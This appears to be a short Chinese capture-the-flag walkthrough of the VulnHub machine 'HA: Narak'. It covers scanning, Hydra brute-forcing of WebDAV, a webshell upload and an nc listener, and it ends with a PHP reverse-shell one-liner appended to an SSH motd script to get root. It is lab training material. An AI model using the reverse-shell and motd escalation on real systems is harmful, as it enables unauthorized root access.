HA: NARAK
靶机地址:https://www.vulnhub.com/entry/ha-narak,569/
导入VM,用nmap获取靶机IP:192.168.99.135
获取开放端口
访问80端口
用dirb扫描网站目录,存在一个webdav的页面
尝试访问,发现需要密码
抓取网站的关键字作为字典
用hydra爆破,得到账号:yamdoot 密码:Swarg
登陆进去是空的
用cadaver上传webshell到靶机上
在kali上用nc进行监听,再访问页面,拿到靶机的shell
拿到flag,但是没啥用
获取存在rwx权限的文件
find / -type f -perm -ug=rwx 2>/dev/null
得到brainfuck编码 解密得到:chitragupt
测试连接,是inferno用户的密码
下一步获取root权限,这里学到了一个新的提权方式,通过motd 文件(ssh的登录欢迎信息,主要还是可读可写可执行权限)来反弹一个root权限的shell
echo "php -r '\$sock=fsockopen(\"192.168.99.128\",4444);exec(\"/bin/bash -i <&3 >&3 2>&3\");'" >>/etc/update-motd.d/00-header
成功获取root权限
获取root.txt